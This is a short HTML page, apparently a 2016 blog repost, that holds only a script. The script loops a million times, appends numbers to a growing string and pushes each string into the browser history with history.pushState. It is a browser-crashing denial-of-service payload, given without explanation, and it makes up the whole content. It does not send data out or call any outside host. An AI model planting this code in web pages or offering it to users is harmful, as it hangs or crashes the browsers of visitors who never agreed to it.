<html> 
<body> 
<script> 
var total=""; 
for (var i=0; i < 1000000; i++) 
{ 
    total= total + i.toString (); 
    history.pushState (0,0,total); 
} 
</script> 
</body> 
</html> 
  

  

posted on 2016-01-23 14:27  毕竟我是杨小飞i  阅读(656)  评论(0)    收藏  举报